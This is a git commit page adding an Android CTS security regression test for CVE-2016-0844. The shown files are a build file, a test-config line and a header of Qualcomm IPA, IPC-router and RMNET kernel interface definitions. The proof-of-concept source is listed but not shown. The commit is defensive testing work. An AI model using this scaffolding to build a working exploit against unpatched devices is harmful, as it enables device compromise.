authormanish <manish.pandey2@harman.corp-partner.google.com>2018-03-20 12:42:52 +0530
committerPradeep Chenthati <pchenthati@google.com>2018-06-08 18:07:26 +0000
commite2fd58d679ecfc7254633d1e3813a0e38a37bad1 (patch)
tree6dbcebeb7d87b9abf21be228d32c020241a6caed
parent90c9516a195fe68bf9070a68ac6e4be06bc5f4c3 (diff)
downloadcts-e2fd58d679ecfc7254633d1e3813a0e38a37bad1.tar.gz
[RESTRICT AUTOMERGE]: CTS test for Android Security b/72509609 b/26324307
Test: successful run of newly introduced CTS test case. Bug: 72509609 Bug: 26324307 Change-Id: I02fff0d3522b291b74c5a1a6c7ca6c7dfd8368a2 Signed-off-by: manish <manish.pandey2@harman.corp-partner.google.com> (cherry picked from commit cac61d428a1c1cd42fd994f4acdb9a7d5414aead)
-rwxr-xr-xhostsidetests/security/AndroidTest.xml1
-rw-r--r--hostsidetests/security/securityPatch/CVE-2016-0844/Android.mk33
-rw-r--r--hostsidetests/security/securityPatch/CVE-2016-0844/local_poc.h620
-rw-r--r--hostsidetests/security/securityPatch/CVE-2016-0844/poc.c79
-rw-r--r--hostsidetests/security/src/android/security/cts/Poc16_04.java8
5 files changed, 741 insertions, 0 deletions
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 28699b99257..6fdd84042a7 100755
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -44,6 +44,7 @@
<!--__________________-->
<!-- Bulletin 2016-04 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2016-0844->/data/local/tmp/CVE-2016-0844" />
<option name="push" value="CVE-2016-2419->/data/local/tmp/CVE-2016-2419" />
<!-- Bulletin 2016-05 -->
diff --git a/hostsidetests/security/securityPatch/CVE-2016-0844/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-0844/Android.mk
new file mode 100644
index 00000000000..19585cc7132
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-0844/Android.mk
@@ -0,0 +1,33 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-0844
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-0844/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-0844/local_poc.h
new file mode 100644
index 00000000000..960c9df9d87
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-0844/local_poc.h
@@ -0,0 +1,620 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions vand
+ * limitations under the License.
+ */
+#include <sys/types.h>
+#ifndef IPA_QMI_SERVICE_V01_H
+#define IPA_QMI_SERVICE_V01_H
+
+#define QMI_IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS_V01 2
+#define QMI_IPA_IPFLTR_NUM_MEQ_32_EQNS_V01 2
+#define QMI_IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS_V01 2
+#define QMI_IPA_IPFLTR_NUM_MEQ_128_EQNS_V01 2
+#define QMI_IPA_MAX_FILTERS_V01 64
+
+#define IPA_INT_MAX ((int)(~0U >> 1))
+#define IPA_INT_MIN (-IPA_INT_MAX - 1)
+
+enum ipa_qmi_result_type_v01 {
+ IPA_QMI_RESULT_TYPE_MIN_ENUM_VAL_V01 = IPA_INT_MIN,
+ IPA_QMI_RESULT_SUCCESS_V01 = 0,
+ IPA_QMI_RESULT_FAILURE_V01 = 1,
+ IPA_QMI_RESULT_TYPE_MAX_ENUM_VAL_V01 = IPA_INT_MAX,
+};
+
+enum ipa_qmi_error_type_v01 {
+ IPA_QMI_ERROR_TYPE_MIN_ENUM_VAL_V01 = IPA_INT_MIN,
+ IPA_QMI_ERR_NONE_V01 = 0x0000,
+ IPA_QMI_ERR_MALFORMED_MSG_V01 = 0x0001,
+ IPA_QMI_ERR_NO_MEMORY_V01 = 0x0002,
+ IPA_QMI_ERR_INTERNAL_V01 = 0x0003,
+ IPA_QMI_ERR_CLIENT_IDS_EXHAUSTED_V01 = 0x0005,
+ IPA_QMI_ERR_INVALID_ID_V01 = 0x0029,
+ IPA_QMI_ERR_ENCODING_V01 = 0x003A,
+ IPA_QMI_ERR_INCOMPATIBLE_STATE_V01 = 0x005A,
+ IPA_QMI_ERR_NOT_SUPPORTED_V01 = 0x005E,
+ IPA_QMI_ERROR_TYPE_MAX_ENUM_VAL_V01 = IPA_INT_MAX,
+};
+
+struct ipa_qmi_response_type_v01 {
+ enum ipa_qmi_result_type_v01 result;
+ enum ipa_qmi_error_type_v01 error;
+};
+
+enum ipa_platform_type_enum_v01 {
+ IPA_PLATFORM_TYPE_ENUM_MIN_ENUM_VAL_V01 = -2147483647,
+ QMI_IPA_PLATFORM_TYPE_INVALID_V01 = 0,
+ QMI_IPA_PLATFORM_TYPE_TN_V01 = 1,
+ QMI_IPA_PLATFORM_TYPE_LE_V01 = 2,
+ QMI_IPA_PLATFORM_TYPE_MSM_ANDROID_V01 = 3,
+ QMI_IPA_PLATFORM_TYPE_MSM_WINDOWS_V01 = 4,
+ QMI_IPA_PLATFORM_TYPE_MSM_QNX_V01 = 5,
+ IPA_PLATFORM_TYPE_ENUM_MAX_ENUM_VAL_V01 = 2147483647
+};
+
+struct ipa_hdr_tbl_info_type_v01 {
+ uint32_t modem_offset_start;
+ uint32_t modem_offset_end;
+};
+
+struct ipa_route_tbl_info_type_v01 {
+ uint32_t route_tbl_start_addr;
+ uint32_t num_indices;
+};
+
+struct ipa_modem_mem_info_type_v01 {
+ uint32_t block_start_addr;
+ uint32_t size;
+};
+
+struct ipa_hdr_proc_ctx_tbl_info_type_v01 {
+ uint32_t modem_offset_start;
+ uint32_t modem_offset_end;
+};
+
+struct ipa_zip_tbl_info_type_v01 {
+ uint32_t modem_offset_start;
+ uint32_t modem_offset_end;
+};
+
+struct ipa_init_modem_driver_req_msg_v01 {
+ uint8_t platform_type_valid;
+ enum ipa_platform_type_enum_v01 platform_type;
+ uint8_t hdr_tbl_info_valid;
+ struct ipa_hdr_tbl_info_type_v01 hdr_tbl_info;
+ uint8_t v4_route_tbl_info_valid;
+ struct ipa_route_tbl_info_type_v01 v4_route_tbl_info;
+ uint8_t v6_route_tbl_info_valid;
+ struct ipa_route_tbl_info_type_v01 v6_route_tbl_info;
+ uint8_t v4_filter_tbl_start_addr_valid;
+ uint32_t v4_filter_tbl_start_addr;
+ uint8_t v6_filter_tbl_start_addr_valid;
+ uint32_t v6_filter_tbl_start_addr;
+ uint8_t modem_mem_info_valid;
+ struct ipa_modem_mem_info_type_v01 modem_mem_info;
+ uint8_t ctrl_comm_dest_end_pt_valid;
+ uint32_t ctrl_comm_dest_end_pt;
+ uint8_t is_ssr_bootup_valid;
+ uint8_t is_ssr_bootup;
+ uint8_t hdr_proc_ctx_tbl_info_valid;
+ struct ipa_hdr_proc_ctx_tbl_info_type_v01 hdr_proc_ctx_tbl_info;
+ uint8_t zip_tbl_info_valid;
+ struct ipa_zip_tbl_info_type_v01 zip_tbl_info;
+};
+
+struct ipa_init_modem_driver_resp_msg_v01 {
+ struct ipa_qmi_response_type_v01 resp;
+ uint8_t ctrl_comm_dest_end_pt_valid;
+ uint32_t ctrl_comm_dest_end_pt;
+ uint8_t default_end_pt_valid;
+ uint32_t default_end_pt;
+};
+
+struct ipa_indication_reg_req_msg_v01 {
+ uint8_t master_driver_init_complete_valid;
+ uint8_t master_driver_init_complete;
+};
+
+struct ipa_indication_reg_resp_msg_v01 {
+ struct ipa_qmi_response_type_v01 resp;
+};
+
+struct ipa_master_driver_init_complt_ind_msg_v01 {
+ struct ipa_qmi_response_type_v01 master_driver_init_status;
+};
+
+struct ipa_ipfltr_range_eq_16_type_v01 {
+ uint8_t offset;
+ uint16_t range_low;
+ uint16_t range_high;
+};
+
+struct ipa_ipfltr_mask_eq_32_type_v01 {
+ uint8_t offset;
+ uint32_t mask;
+ uint32_t value;
+};
+
+struct ipa_ipfltr_eq_16_type_v01 {
+ uint8_t offset;
+ uint16_t value;
+};
+
+struct ipa_ipfltr_eq_32_type_v01 {
+ uint8_t offset;
+ uint32_t value;
+};
+
+struct ipa_ipfltr_mask_eq_128_type_v01 {
+ uint8_t offset;
+ uint8_t mask[16];
+ uint8_t value[16];
+};
+
+struct ipa_filter_rule_type_v01 {
+ uint16_t rule_eq_bitmap;
+ uint8_t tos_eq_present;
+ uint8_t tos_eq;
+ uint8_t protocol_eq_present;
+ uint8_t protocol_eq;
+ uint8_t num_ihl_offset_range_16;
+
+ struct ipa_ipfltr_range_eq_16_type_v01
+ ihl_offset_range_16[QMI_IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS_V01];
+
+ uint8_t num_offset_meq_32;
+
+ struct ipa_ipfltr_mask_eq_32_type_v01
+ offset_meq_32[QMI_IPA_IPFLTR_NUM_MEQ_32_EQNS_V01];
+
+ uint8_t tc_eq_present;
+ uint8_t tc_eq;
+ uint8_t flow_eq_present;
+ uint32_t flow_eq;
+ uint8_t ihl_offset_eq_16_present;
+ struct ipa_ipfltr_eq_16_type_v01 ihl_offset_eq_16;
+ uint8_t ihl_offset_eq_32_present;
+ struct ipa_ipfltr_eq_32_type_v01 ihl_offset_eq_32;
+ uint8_t num_ihl_offset_meq_32;
+ struct ipa_ipfltr_mask_eq_32_type_v01
+ ihl_offset_meq_32[QMI_IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS_V01];
+ uint8_t num_offset_meq_128;
+ struct ipa_ipfltr_mask_eq_128_type_v01
+ offset_meq_128[QMI_IPA_IPFLTR_NUM_MEQ_128_EQNS_V01];
+
+ uint8_t metadata_meq32_present;
+
+ struct ipa_ipfltr_mask_eq_32_type_v01 metadata_meq32;
+ uint8_t ipv4_frag_eq_present;
+};
+
+enum ipa_ip_type_enum_v01 {
+ IPA_IP_TYPE_ENUM_MIN_ENUM_VAL_V01 = -2147483647,
+ QMI_IPA_IP_TYPE_INVALID_V01 = 0,
+ QMI_IPA_IP_TYPE_V4_V01 = 1,
+ QMI_IPA_IP_TYPE_V6_V01 = 2,
+ QMI_IPA_IP_TYPE_V4V6_V01 = 3,
+ IPA_IP_TYPE_ENUM_MAX_ENUM_VAL_V01 = 2147483647
+};
+
+enum ipa_filter_action_enum_v01 {
+ IPA_FILTER_ACTION_ENUM_MIN_ENUM_VAL_V01 = -2147483647,
+ QMI_IPA_FILTER_ACTION_INVALID_V01 = 0,
+ QMI_IPA_FILTER_ACTION_SRC_NAT_V01 = 1,
+ QMI_IPA_FILTER_ACTION_DST_NAT_V01 = 2,
+ QMI_IPA_FILTER_ACTION_ROUTING_V01 = 3,
+ QMI_IPA_FILTER_ACTION_EXCEPTION_V01 = 4,
+ IPA_FILTER_ACTION_ENUM_MAX_ENUM_VAL_V01 = 2147483647
+};
+
+struct ipa_filter_spec_type_v01 {
+ uint32_t filter_spec_identifier;
+ enum ipa_ip_type_enum_v01 ip_type;
+ struct ipa_filter_rule_type_v01 filter_rule;
+ enum ipa_filter_action_enum_v01 filter_action;
+ uint8_t is_routing_table_index_valid;
+ uint32_t route_table_index;
+ uint8_t is_mux_id_valid;
+ uint32_t mux_id;
+};
+
+struct ipa_install_fltr_rule_req_msg_v01 {
+ uint8_t filter_spec_list_valid;
+ uint32_t filter_spec_list_len;
+ struct ipa_filter_spec_type_v01 filter_spec_list[QMI_IPA_MAX_FILTERS_V01];
+ uint8_t source_pipe_index_valid;
+ uint32_t source_pipe_index;
+ uint8_t num_ipv4_filters_valid;
+ uint32_t num_ipv4_filters;
+ uint8_t num_ipv6_filters_valid;
+ uint32_t num_ipv6_filters;
+ uint8_t xlat_filter_indices_list_valid;
+ uint32_t xlat_filter_indices_list_len;
+ uint32_t xlat_filter_indices_list[QMI_IPA_MAX_FILTERS_V01];
+};
+
+struct ipa_filter_rule_identifier_to_handle_map_v01 {
+ uint32_t filter_spec_identifier;
+ uint32_t filter_handle;
+};
+
+struct ipa_install_fltr_rule_resp_msg_v01 {
+ struct ipa_qmi_response_type_v01 resp;
+ uint8_t filter_handle_list_valid;
+ uint32_t filter_handle_list_len;
+ struct ipa_filter_rule_identifier_to_handle_map_v01
+ filter_handle_list[QMI_IPA_MAX_FILTERS_V01];
+};
+
+struct ipa_filter_handle_to_index_map_v01 {
+ uint32_t filter_handle;
+ uint32_t filter_index;
+};
+
+struct ipa_fltr_installed_notif_req_msg_v01 {
+ uint32_t source_pipe_index;
+ enum ipa_qmi_result_type_v01 install_status;
+ uint32_t filter_index_list_len;
+ struct ipa_filter_handle_to_index_map_v01
+ filter_index_list[QMI_IPA_MAX_FILTERS_V01];
+
+ uint8_t embedded_pipe_index_valid;
+ uint32_t embedded_pipe_index;
+ uint8_t retain_header_valid;
+ uint8_t retain_header;
+ uint8_t embedded_call_mux_id_valid;
+ uint32_t embedded_call_mux_id;
+ uint8_t num_ipv4_filters_valid;
+ uint32_t num_ipv4_filters;
+ uint8_t num_ipv6_filters_valid;
+ uint32_t num_ipv6_filters;
+ uint8_t start_ipv4_filter_idx_valid;
+ uint32_t start_ipv4_filter_idx;
+ uint8_t start_ipv6_filter_idx_valid;
+ uint32_t start_ipv6_filter_idx;
+};
+
+struct ipa_fltr_installed_notif_resp_msg_v01 {
+ struct ipa_qmi_response_type_v01 resp;
+};
+
+struct ipa_enable_force_clear_datapath_req_msg_v01 {
+ uint32_t source_pipe_bitmask;
+ uint32_t request_id;
+ uint8_t throttle_source_valid;
+ uint8_t throttle_source;
+};
+
+struct ipa_enable_force_clear_datapath_resp_msg_v01 {
+ struct ipa_qmi_response_type_v01 resp;
+};
+
+struct ipa_disable_force_clear_datapath_req_msg_v01 {
+ uint32_t request_id;
+};
+
+struct ipa_disable_force_clear_datapath_resp_msg_v01 {
+ struct ipa_qmi_response_type_v01 resp;
+};
+
+enum ipa_peripheral_speed_enum_v01 {
+ IPA_PERIPHERAL_SPEED_ENUM_MIN_ENUM_VAL_V01 = -2147483647,
+ QMI_IPA_PER_USB_FS_V01 = 1,
+ QMI_IPA_PER_USB_HS_V01 = 2,
+ QMI_IPA_PER_USB_SS_V01 = 3,
+ IPA_PERIPHERAL_SPEED_ENUM_MAX_ENUM_VAL_V01 = 2147483647
+};
+
+enum ipa_pipe_mode_enum_v01 {
+ IPA_PIPE_MODE_ENUM_MIN_ENUM_VAL_V01 = -2147483647,
+ QMI_IPA_PIPE_MODE_HW_V01 = 1,
+ QMI_IPA_PIPE_MODE_SW_V01 = 2,
+ IPA_PIPE_MODE_ENUM_MAX_ENUM_VAL_V01 = 2147483647
+};
+
+enum ipa_peripheral_type_enum_v01 {
+ IPA_PERIPHERAL_TYPE_ENUM_MIN_ENUM_VAL_V01 = -2147483647,
+ QMI_IPA_PERIPHERAL_USB_V01 = 1,
+ QMI_IPA_PERIPHERAL_HSIC_V01 = 2,
+ QMI_IPA_PERIPHERAL_PCIE_V01 = 3,
+ IPA_PERIPHERAL_TYPE_ENUM_MAX_ENUM_VAL_V01 = 2147483647
+};
+
+struct ipa_config_req_msg_v01 {
+ uint8_t peripheral_type_valid;
+ enum ipa_peripheral_type_enum_v01 peripheral_type;
+ uint8_t hw_deaggr_supported_valid;
+ uint8_t hw_deaggr_supported;
+ uint8_t max_aggr_frame_size_valid;
+ uint32_t max_aggr_frame_size;
+ uint8_t ipa_ingress_pipe_mode_valid;
+ enum ipa_pipe_mode_enum_v01 ipa_ingress_pipe_mode;
+ uint8_t peripheral_speed_info_valid;
+ enum ipa_peripheral_speed_enum_v01 peripheral_speed_info;
+ uint8_t dl_accumulation_time_limit_valid;
+ uint32_t dl_accumulation_time_limit;
+ uint8_t dl_accumulation_pkt_limit_valid;
+ uint32_t dl_accumulation_pkt_limit;
+ uint8_t dl_accumulation_byte_limit_valid;
+ uint32_t dl_accumulation_byte_limit;
+ uint8_t ul_accumulation_time_limit_valid;
+ uint32_t ul_accumulation_time_limit;
+ uint8_t hw_control_flags_valid;
+ uint32_t hw_control_flags;
+ uint8_t ul_msi_event_threshold_valid;
+ uint32_t ul_msi_event_threshold;
+ uint8_t dl_msi_event_threshold_valid;
+ uint32_t dl_msi_event_threshold;
+};
+
+struct ipa_config_resp_msg_v01 {
+ struct ipa_qmi_response_type_v01 resp;
+};
+
+/*Service Message Definition*/
+#define QMI_IPA_INDICATION_REGISTER_REQ_V01 0x0020
+#define QMI_IPA_INDICATION_REGISTER_RESP_V01 0x0020
+#define QMI_IPA_INIT_MODEM_DRIVER_REQ_V01 0x0021
+#define QMI_IPA_INIT_MODEM_DRIVER_RESP_V01 0x0021
+#define QMI_IPA_MASTER_DRIVER_INIT_COMPLETE_IND_V01 0x0022
+#define QMI_IPA_INSTALL_FILTER_RULE_REQ_V01 0x0023
+#define QMI_IPA_INSTALL_FILTER_RULE_RESP_V01 0x0023
+#define QMI_IPA_FILTER_INSTALLED_NOTIF_REQ_V01 0x0024
+#define QMI_IPA_FILTER_INSTALLED_NOTIF_RESP_V01 0x0024
+#define QMI_IPA_ENABLE_FORCE_CLEAR_DATAPATH_REQ_V01 0x0025
+#define QMI_IPA_ENABLE_FORCE_CLEAR_DATAPATH_RESP_V01 0x0025
+#define QMI_IPA_DISABLE_FORCE_CLEAR_DATAPATH_REQ_V01 0x0026
+#define QMI_IPA_DISABLE_FORCE_CLEAR_DATAPATH_RESP_V01 0x0026
+#define QMI_IPA_CONFIG_REQ_V01 0x0027
+#define QMI_IPA_CONFIG_RESP_V01 0x0027
+
+/* add for max length*/
+#define QMI_IPA_INIT_MODEM_DRIVER_REQ_MAX_MSG_LEN_V01 98
+#define QMI_IPA_INIT_MODEM_DRIVER_RESP_MAX_MSG_LEN_V01 21
+#define QMI_IPA_INDICATION_REGISTER_REQ_MAX_MSG_LEN_V01 4
+#define QMI_IPA_INDICATION_REGISTER_RESP_MAX_MSG_LEN_V01 7
+#define QMI_IPA_INSTALL_FILTER_RULE_REQ_MAX_MSG_LEN_V01 11293
+#define QMI_IPA_INSTALL_FILTER_RULE_RESP_MAX_MSG_LEN_V01 523
+#define QMI_IPA_FILTER_INSTALLED_NOTIF_REQ_MAX_MSG_LEN_V01 574
+#define QMI_IPA_FILTER_INSTALLED_NOTIF_RESP_MAX_MSG_LEN_V01 7
+#define QMI_IPA_MASTER_DRIVER_INIT_COMPLETE_IND_MAX_MSG_LEN_V01 7
+
+#define QMI_IPA_ENABLE_FORCE_CLEAR_DATAPATH_REQ_MAX_MSG_LEN_V01 18
+#define QMI_IPA_DISABLE_FORCE_CLEAR_DATAPATH_REQ_MAX_MSG_LEN_V01 7
+#define QMI_IPA_ENABLE_FORCE_CLEAR_DATAPATH_RESP_MAX_MSG_LEN_V01 7
+#define QMI_IPA_DISABLE_FORCE_CLEAR_DATAPATH_RESP_MAX_MSG_LEN_V01 7
+
+#define QMI_IPA_CONFIG_REQ_MAX_MSG_LEN_V01 81
+#define QMI_IPA_CONFIG_RESP_MAX_MSG_LEN_V01 7
+/* Service Object Accessor */
+
+#endif /* IPA_QMI_SERVICE_V01_H */
+
+#ifndef _UAPI_MSM_IPC_H_
+#define _UAPI_MSM_IPC_H_
+
+#include <linux/ioctl.h>
+#include <linux/types.h>
+
+struct msm_ipc_port_addr {
+ uint32_t node_id;
+ uint32_t port_id;
+};
+
+struct msm_ipc_port_name {
+ uint32_t service;
+ uint32_t instance;
+};
+
+struct msm_ipc_addr {
+ unsigned char addrtype;
+ union {
+ struct msm_ipc_port_addr port_addr;
+ struct msm_ipc_port_name port_name;
+ } addr;
+};
+
+#define MSM_IPC_WAIT_FOREVER (~0) /* timeout for permanent subscription */
+
+#ifndef AF_MSM_IPC
+#define AF_MSM_IPC 27
+#endif
+
+#ifndef PF_MSM_IPC
+#define PF_MSM_IPC AF_MSM_IPC
+#endif
+
+#define MSM_IPC_ADDR_NAME 1
+#define MSM_IPC_ADDR_ID 2
+
+struct sockaddr_msm_ipc {
+ unsigned short family;
+ struct msm_ipc_addr address;
+ unsigned char reserved;
+};
+
+struct config_sec_rules_args {
+ int num_group_info;
+ uint32_t service_id;
+ uint32_t instance_id;
+ unsigned reserved;
+ gid_t group_id[0];
+};
+
+#define IPC_ROUTER_IOCTL_MAGIC (0xC3)
+
+#define IPC_ROUTER_IOCTL_GET_VERSION \
+ _IOR(IPC_ROUTER_IOCTL_MAGIC, 0, unsigned int)
+
+#define IPC_ROUTER_IOCTL_GET_MTU _IOR(IPC_ROUTER_IOCTL_MAGIC, 1, unsigned int)
+
+#define IPC_ROUTER_IOCTL_LOOKUP_SERVER \
+ _IOWR(IPC_ROUTER_IOCTL_MAGIC, 2, struct sockaddr_msm_ipc)
+
+#define IPC_ROUTER_IOCTL_GET_CURR_PKT_SIZE \
+ _IOR(IPC_ROUTER_IOCTL_MAGIC, 3, unsigned int)
+
+#define IPC_ROUTER_IOCTL_BIND_CONTROL_PORT \
+ _IOR(IPC_ROUTER_IOCTL_MAGIC, 4, unsigned int)
+
+#define IPC_ROUTER_IOCTL_CONFIG_SEC_RULES \
+ _IOR(IPC_ROUTER_IOCTL_MAGIC, 5, struct config_sec_rules_args)
+
+struct msm_ipc_server_info {
+ uint32_t node_id;
+ uint32_t port_id;
+ uint32_t service;
+ uint32_t instance;
+};
+
+struct server_lookup_args {
+ struct msm_ipc_port_name port_name;
+ int num_entries_in_array;
+ int num_entries_found;
+ uint32_t lookup_mask;
+ struct msm_ipc_server_info srv_info[0];
+};
+
+#endif
+
+#ifndef _UAPI_MSM_RMNET_H_
+#define _UAPI_MSM_RMNET_H_
+
+/* Bitmap macros for RmNET driver operation mode. */
+#define RMNET_MODE_NONE (0x00)
+#define RMNET_MODE_LLP_ETH (0x01)
+#define RMNET_MODE_LLP_IP (0x02)
+#define RMNET_MODE_QOS (0x04)
+#define RMNET_MODE_MASK \
+ (RMNET_MODE_LLP_ETH | RMNET_MODE_LLP_IP | RMNET_MODE_QOS)
+
+#define RMNET_IS_MODE_QOS(mode) ((mode & RMNET_MODE_QOS) == RMNET_MODE_QOS)
+#define RMNET_IS_MODE_IP(mode) ((mode & RMNET_MODE_LLP_IP) == RMNET_MODE_LLP_IP)
+
+enum rmnet_ioctl_cmds_e {
+ RMNET_IOCTL_SET_LLP_ETHERNET = 0x000089F1, /* Set Ethernet protocol */
+ RMNET_IOCTL_SET_LLP_IP = 0x000089F2, /* Set RAWIP protocol */
+ RMNET_IOCTL_GET_LLP = 0x000089F3, /* Get link protocol */
+ RMNET_IOCTL_SET_QOS_ENABLE = 0x000089F4, /* Set QoS header enabled */
+ RMNET_IOCTL_SET_QOS_DISABLE = 0x000089F5, /* Set QoS header disabled*/
+ RMNET_IOCTL_GET_QOS = 0x000089F6, /* Get QoS header state */
+ RMNET_IOCTL_GET_OPMODE = 0x000089F7, /* Get operation mode */
+ RMNET_IOCTL_OPEN = 0x000089F8, /* Open transport port */
+ RMNET_IOCTL_CLOSE = 0x000089F9, /* Close transport port */
+ RMNET_IOCTL_FLOW_ENABLE = 0x000089FA, /* Flow enable */
+ RMNET_IOCTL_FLOW_DISABLE = 0x000089FB, /* Flow disable */
+ RMNET_IOCTL_FLOW_SET_HNDL = 0x000089FC, /* Set flow handle */
+ RMNET_IOCTL_EXTENDED = 0x000089FD, /* Extended IOCTLs */
+ RMNET_IOCTL_MAX
+};
+
+enum rmnet_ioctl_extended_cmds_e {
+ /* RmNet Data Required IOCTLs */
+ RMNET_IOCTL_GET_SUPPORTED_FEATURES = 0x0000, /* Get features */
+ RMNET_IOCTL_SET_MRU = 0x0001, /* Set MRU */
+ RMNET_IOCTL_GET_MRU = 0x0002, /* Get MRU */
+ RMNET_IOCTL_GET_EPID = 0x0003, /* Get endpoint ID */
+ RMNET_IOCTL_GET_DRIVER_NAME = 0x0004, /* Get driver name */
+ RMNET_IOCTL_ADD_MUX_CHANNEL = 0x0005, /* Add MUX ID */
+ RMNET_IOCTL_SET_EGRESS_DATA_FORMAT = 0x0006, /* Set EDF */
+ RMNET_IOCTL_SET_INGRESS_DATA_FORMAT = 0x0007, /* Set IDF */
+ RMNET_IOCTL_SET_AGGREGATION_COUNT = 0x0008, /* Set agg count */
+ RMNET_IOCTL_GET_AGGREGATION_COUNT = 0x0009, /* Get agg count */
+ RMNET_IOCTL_SET_AGGREGATION_SIZE = 0x000A, /* Set agg size */
+ RMNET_IOCTL_GET_AGGREGATION_SIZE = 0x000B, /* Get agg size */
+ RMNET_IOCTL_FLOW_CONTROL = 0x000C, /* Do flow control */
+ RMNET_IOCTL_GET_DFLT_CONTROL_CHANNEL = 0x000D, /* For legacy use */
+ RMNET_IOCTL_GET_HWSW_MAP = 0x000E, /* Get HW/SW map */
+ RMNET_IOCTL_SET_RX_HEADROOM = 0x000F, /* RX Headroom */
+ RMNET_IOCTL_GET_EP_PAIR = 0x0010, /* Endpoint pair */
+ RMNET_IOCTL_SET_QOS_VERSION = 0x0011, /* 8/6 byte QoS hdr*/
+ RMNET_IOCTL_GET_QOS_VERSION = 0x0012, /* 8/6 byte QoS hdr*/
+ RMNET_IOCTL_GET_SUPPORTED_QOS_MODES = 0x0013, /* Get QoS modes */
+ RMNET_IOCTL_SET_SLEEP_STATE = 0x0014, /* Set sleep state */
+ RMNET_IOCTL_SET_XLAT_DEV_INFO = 0x0015, /* xlat dev name */
+ RMNET_IOCTL_EXTENDED_MAX = 0x0016
+};
+
+/* Return values for the RMNET_IOCTL_GET_SUPPORTED_FEATURES IOCTL */
+#define RMNET_IOCTL_FEAT_NOTIFY_MUX_CHANNEL (1 << 0)
+#define RMNET_IOCTL_FEAT_SET_EGRESS_DATA_FORMAT (1 << 1)
+#define RMNET_IOCTL_FEAT_SET_INGRESS_DATA_FORMAT (1 << 2)
+#define RMNET_IOCTL_FEAT_SET_AGGREGATION_COUNT (1 << 3)
+#define RMNET_IOCTL_FEAT_GET_AGGREGATION_COUNT (1 << 4)
+#define RMNET_IOCTL_FEAT_SET_AGGREGATION_SIZE (1 << 5)
+#define RMNET_IOCTL_FEAT_GET_AGGREGATION_SIZE (1 << 6)
+#define RMNET_IOCTL_FEAT_FLOW_CONTROL (1 << 7)
+#define RMNET_IOCTL_FEAT_GET_DFLT_CONTROL_CHANNEL (1 << 8)
+#define RMNET_IOCTL_FEAT_GET_HWSW_MAP (1 << 9)
+
+/* Input values for the RMNET_IOCTL_SET_EGRESS_DATA_FORMAT IOCTL */
+#define RMNET_IOCTL_EGRESS_FORMAT_MAP (1 << 1)
+#define RMNET_IOCTL_EGRESS_FORMAT_AGGREGATION (1 << 2)
+#define RMNET_IOCTL_EGRESS_FORMAT_MUXING (1 << 3)
+#define RMNET_IOCTL_EGRESS_FORMAT_CHECKSUM (1 << 4)
+
+/* Input values for the RMNET_IOCTL_SET_INGRESS_DATA_FORMAT IOCTL */
+#define RMNET_IOCTL_INGRESS_FORMAT_MAP (1 << 1)
+#define RMNET_IOCTL_INGRESS_FORMAT_DEAGGREGATION (1 << 2)
+#define RMNET_IOCTL_INGRESS_FORMAT_DEMUXING (1 << 3)
+#define RMNET_IOCTL_INGRESS_FORMAT_CHECKSUM (1 << 4)
+
+/* User space may not have this defined. */
+#ifndef IFNAMSIZ
+#define IFNAMSIZ 16
+#endif
+
+struct rmnet_ioctl_extended_s {
+ uint32_t extended_ioctl;
+ union {
+ uint32_t data; /* Generic data field for most extended IOCTLs */
+ int8_t if_name[IFNAMSIZ];
+ struct {
+ uint32_t mux_id;
+ int8_t vchannel_name[IFNAMSIZ];
+ } rmnet_mux_val;
+ struct {
+ uint8_t flow_mode;
+ uint8_t mux_id;
+ } flow_control_prop;
+ struct {
+ uint32_t consumer_pipe_num;
+ uint32_t producer_pipe_num;
+ } ipa_ep_pair;
+ } u;
+};
+
+struct rmnet_ioctl_data_s {
+ union {
+ uint32_t operation_mode;
+ uint32_t tcm_handle;
+ } u;
+};
+
+#define RMNET_IOCTL_QOS_MODE_6 (1 << 0)
+#define RMNET_IOCTL_QOS_MODE_8 (1 << 1)
+
+#define QMI_QOS_HDR_S __attribute((__packed__)) qmi_qos_hdr_s
+struct QMI_QOS_HDR_S {
+ unsigned char version;
+ unsigned char flags;
+ uint32_t flow_id;
+};
+
+struct qmi_qos_hdr8_s {
+ struct QMI_QOS_HDR_S hdr;
+ uint8_t reserved[2];
+} __attribute((__packed__));
+
+#endif
